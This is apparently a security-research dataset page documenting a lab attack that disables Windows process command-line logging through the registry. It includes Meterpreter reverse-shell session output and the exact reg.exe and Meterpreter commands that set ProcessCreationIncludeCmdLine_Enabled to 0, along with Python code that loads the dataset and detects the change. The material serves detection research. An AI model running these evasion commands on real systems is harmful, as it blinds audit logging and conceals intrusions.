Disabling Process Command Line Logging via Registry Modification
Metadata

| Contributors | Jose Rodriguez @Cyb3rPandaH |
|---|---|
| Creation Date | 2022/07/03 |
| Modification Date | 2022/08/18 |
| Tactics | |
| Techniques | |
| Tags | reg, cmd, microsoft windows security auditing |
Dataset Description

After getting a shell with elevated privileges on the target, we used reg.exe to modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit registry key. Command line logging in process creation events (Microsoft Windows Security Auditing, event 4688) was disabled by changing the data of the ProcessCreationIncludeCmdLine_Enabled registry value from 1 to 0. This dataset was generated using a Windows 10 Pro edition (Version: 1903, OS Build: 18362.30) and Kali Linux (Version: 2022.2).
Datasets Downloads

| Type | Link |
|---|---|
| Host | |
| Host | |
Adversary View

Using reg.exe

```text
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: kmnbsoc3) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 10 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 20:34:35 -0400
meterpreter > shell
Process 5028 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\pedro\Downloads>reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit /t REG_DWORD /v ProcessCreationIncludeCmdLine_Enabled /d 0 /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit /t REG_DWORD /v ProcessCreationIncludeCmdLine_Enabled /d 0 /f
The operation completed successfully.
C:\Users\pedro\Downloads>
```

Using reg (Meterpreter)

```text
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.56.40:8443
[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: wqp60sgl) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 4 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 18:46:35 -0400
meterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' -v 'ProcessCreationIncludeCmdLine_Enabled' -t 'REG_DWORD' -d 0
Successfully set ProcessCreationIncludeCmdLine_Enabled of REG_DWORD.
meterpreter >
```
Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# The dataset is published as a zip archive containing one JSON-lines file
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_cmd_process_commandline_logging_disabled.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the single file in the archive and keep its local path
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```
Read JSON File

```python
import pandas as pd

# One JSON object per line, so lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
```
Access Security Events

```python
# Count events per log channel, largest first
df.groupby(['Channel']).size().sort_values(ascending=False)
```
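The description above explains the change the dataset records (the ProcessCreationIncludeCmdLine_Enabled value under the Audit key set from 1 to 0), and the cells above load the JSON-lines file into a DataFrame. The following added example, which is not part of the original dataset notebook, goes one step further and runs a detection over such a DataFrame: it flags a Sysmon EventID 13 (registry value set) or a Security EventID 4657 (registry value modified) whose target is that value and whose new data is 0. The sample events are constructed for the example, and the field names (TargetObject, Details, ObjectName, ObjectValueName, NewValue, Image, ProcessName) are assumed to follow the Sysmon and Security event XML as flattened into the dataset's JSON lines; the `load_events`, `_is_zero`, `_col` and `find_cmdline_logging_disabled` helpers are hypothetical names introduced here.

```python
import json
import re
from io import StringIO

import pandas as pd

VALUE_NAME = "ProcessCreationIncludeCmdLine_Enabled"
AUDIT_KEY_SUFFIX = "\\Policies\\System\\Audit"
SYSMON_CHANNEL = "Microsoft-Windows-Sysmon/Operational"

# Constructed sample events (not taken from the dataset). Field names are an
# assumption: they follow the Sysmon 13 / Security 4657 event XML as flattened
# into JSON lines, the layout the notebook cells above load with read_json.
SAMPLE_EVENTS = [
    # Sysmon 13: reg.exe sets the audit switch to 0 -> must be flagged
    {"Channel": SYSMON_CHANNEL, "EventID": 13, "EventType": "SetValue",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
                     "\\Policies\\System\\Audit\\" + VALUE_NAME,
     "Details": "DWORD (0x00000000)"},
    # Sysmon 13: same value set back to 1 (e.g. a policy refresh) -> ignored
    {"Channel": SYSMON_CHANNEL, "EventID": 13, "EventType": "SetValue",
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
                     "\\Policies\\System\\Audit\\" + VALUE_NAME,
     "Details": "DWORD (0x00000001)"},
    # Security 4657 (only logged when the key carries a SACL): value 1 -> 0
    {"Channel": "Security", "EventID": 4657,
     "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows"
                   "\\CurrentVersion\\Policies\\System\\Audit",
     "ObjectValueName": VALUE_NAME, "OldValue": "1", "NewValue": "0",
     "ProcessName": "C:\\Windows\\System32\\reg.exe"},
    # Security 4688: unrelated reg.exe process creation -> ignored
    {"Channel": "Security", "EventID": 4688,
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query HKLM\\SOFTWARE\\Example /v Setting"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS) + "\n"


def load_events(jsonl_text: str) -> pd.DataFrame:
    """Parse JSON lines (same layout as the dataset file) into a DataFrame."""
    return pd.read_json(StringIO(jsonl_text), lines=True)


def _is_zero(value) -> bool:
    """True when registry data is recorded as DWORD 0 in any common rendering:
    Sysmon's 'DWORD (0x00000000)', the Security log's '0', or a number that
    pandas type inference produced from such a string."""
    if value is None or (isinstance(value, float) and pd.isna(value)):
        return False
    text = str(value).strip()
    match = re.fullmatch(r"DWORD \((0x[0-9A-Fa-f]+)\)", text)
    if match:
        return int(match.group(1), 16) == 0
    for parse in (lambda t: int(t, 0), float):
        try:
            return parse(text) == 0
        except ValueError:
            continue
    return False


def _col(df: pd.DataFrame, name: str) -> pd.Series:
    """Column as strings, '' where the field is absent for other event types."""
    if name not in df.columns:
        return pd.Series("", index=df.index)
    return df[name].fillna("").astype(str)


def find_cmdline_logging_disabled(df: pd.DataFrame) -> pd.DataFrame:
    """Return the events that set ProcessCreationIncludeCmdLine_Enabled to 0."""
    channel, event_id = _col(df, "Channel"), _col(df, "EventID")

    # Sysmon 13: TargetObject is the full value path, Details the new data
    sysmon_hit = (
        (channel == SYSMON_CHANNEL) & (event_id == "13")
        & _col(df, "TargetObject").str.endswith(AUDIT_KEY_SUFFIX + "\\" + VALUE_NAME)
        & _col(df, "Details").map(_is_zero)
    )
    # Security 4657: key in ObjectName, value in ObjectValueName, data in NewValue
    security_hit = (
        (channel == "Security") & (event_id == "4657")
        & _col(df, "ObjectName").str.endswith(AUDIT_KEY_SUFFIX)
        & (_col(df, "ObjectValueName") == VALUE_NAME)
        & _col(df, "NewValue").map(_is_zero)
    )
    hits = df[sysmon_hit | security_hit].copy()
    # Whichever channel recorded the change, surface the process that made it
    image = _col(hits, "Image")
    hits["Actor"] = image.where(image != "", _col(hits, "ProcessName"))
    return hits


if __name__ == "__main__":
    hits = find_cmdline_logging_disabled(load_events(SAMPLE_JSONL))
    print(hits[["Channel", "EventID", "Actor"]].to_string(index=False))
```

Run against the real dataset by replacing `load_events(SAMPLE_JSONL)` with the `df` loaded above; the two channels are checked independently because Security 4657 only appears when the Audit key carries a SACL, whereas Sysmon 13 needs a registry rule covering the key, so either source alone may be the only one that recorded the change.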